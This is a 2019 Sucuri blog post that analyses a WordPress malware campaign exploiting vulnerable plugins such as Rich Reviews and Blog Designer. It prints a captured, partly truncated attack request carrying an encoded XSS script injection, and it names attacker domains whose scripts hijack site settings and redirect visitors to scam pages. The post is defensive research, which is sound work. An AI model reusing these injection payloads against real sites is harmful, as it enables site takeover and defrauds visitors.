• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
A New Wave of Buggy WordPress Infections

A New Wave of Buggy WordPress Infections

October 2, 2019Denis Sinegubko

FacebookTwitterSubscribe

We’ve been following an ongoing malware campaign for the past couple of years now. This campaign is renowned for its prompt addition of exploits for newly discovered WordPress theme and plugin vulnerabilities.

Every other week, the attackers introduce new domain names and slightly change the obfuscation of their scripts to prevent detection. For example, last week they started using URLs on the following domains:

* dns.createrelativechanging[.]com (Creation Date: 2019-09-19)
* bes.belaterbewasthere[.]com  (Creation Date: 2019-09-21)

To provide more context, you can find additional posts following the evolution of this malware campaign below.

Plugins Under Attack – Labs Notes & Blog Articles:

  • August 2019
  • July 2019
  • June 2019
  • May 2019
  • March 2019
  • October 2018

Examples of the Latest Injections

Here’s a request used in a recent attack on the vulnerable versions of the Rich Reviews plugin.

149.202.215.42 - read-more-text=Readme+more%22%3B%3C%2Fscript%3E%3Cscript+type%3Dtext%2Fjavascript+%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10...skipped...%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cscript%3E
&show-less-text=Readme+more%22%3B%3C%2Fscript%3E%3Cscript+type%3Dtext%2Fjavascript+%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C...skipped...100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cscript%3E
&update=rr-update-options [28/Sep/2019:18:10:18 +0000] "POST /wp-admin/admin-post.php?page=fp_admin_options_page HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

It injects the following script into vulnerable websites.

Obfuscated Malware Injection from belaterbewasthere[.]com
Obfuscated hxxps://bes.belaterbewasthere[.]com/corn/flex.js?tp=799 injection.

We’re also seeing another variation being injected into the custom_css section of vulnerable sites using the Blog Designer plugin.

Malware injection from createrrelativechanging[.]com
dns.createrelativechanging[.]com injection

In this case, we find a more elaborate obfuscation method that uses random variable names and comments inside the character code array.

XSS and Redirect

The injection fetches the content from https://dns.createrelativechanging[.]com/publicity/souce.js?c=sdlkfjfhgfcw&type=1&pgn and runs it as code of a “todo” function, which pretends to be doing nothing but adding x to y.

The script executes an XSS exploit code for logged in users, which attempts to change the siteurl and home options. Users that aren’t logged in are simply redirected to push notification scam sites, such asredrelaxfollow[.]com or greenrelaxfollow[.]com.

XSS Exploit Code Used in Malware Campaign
Part of the XSS exploit code

Buggy Injection

These two types of obfuscation were clearly not enough for the bad actors, however. We’ve also noticed a number of other obfuscation methods used in this new wave of campaign.

On some sites, we see injected code similar to the previous sample, which loads content from https://bes.belaterbewasthere[.]com/trans/downtape.js with an additional layer of String.fromCharCode obfuscation.

Looking at this code, it’s clear that there is a bug in it. There is an array of char codes, but no String.fromCharCode function that will decode it into an executable text.

At the time of writing, we already see 89 sites with this buggy code indexed by PublicWWW.

Conclusion

It’s not unusual to see buggy malware. Sometimes it even breaks sites, which is more typical to PHP malware.

Fortunately for website owners, this faulty JavaScript doesn’t affect the functionality of infected sites⁠—in this case, it only results in non-functional malware.

The fact that their malware isn’t working doesn’t mean that webmasters should ignore this threat, however. It’s presence proves that the site is vulnerable and the next infection attempt will most likely be successful.

Any website compromise is a sign that you need to remove the malware and harden your site as soon as possible. To mitigate threats, we encourage site owners to make sure that all of their themes and plugins are up to date with the latest patches and security updates.

In the event that you can’t regularly monitor or update your website’s software, you can use a web application firewall (WAF) to virtually patch known vulnerabilities.

FacebookTwitterSubscribe

Categories: Website Security, WordPress SecurityTags: Black Hat Tactics, Obfuscation, WordPress Plugins and Themes

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.